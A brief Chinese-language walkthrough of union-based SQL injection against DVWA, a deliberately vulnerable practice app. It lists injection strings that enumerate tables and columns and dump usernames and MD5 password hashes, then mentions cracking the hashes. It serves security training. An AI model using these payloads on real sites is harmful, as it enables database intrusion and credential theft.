在dvwaSQL注入模块中
判断出为字符型注入。
id=1' and 1=1 -- 执行成功
id=1' and 1=2 -- 执行失败
使用order by判断列数为2。
id=1' order by 2 -- 执行成功
id=1' order by 3 -- 执行失败
使用union select联合查询
查表:
id=1' and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema=database() --
id=1' and 1=2 union select (select group_concat(table_name)from information_schema.tables where table_schema=database()),2 --
查字段:
id=1' and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_schema='dvwa' and table_name='users' --
id=1' and 1=2 union select (select group_concat(column_name)from information_schema.columns where table_schema='dvwa' and table_name='users'),2 --
查内容:
id=1' and 1=2 union select group_concat(user,password),2 from dvwa.users --
id=1' and 1=2 union select (select group_concat(user,password)from dvwa.users),2 --
查询出的密码使用md5进行了加密,可以使用网上的在线解码进行解码操作。
md5加密的密码只能暴力破解。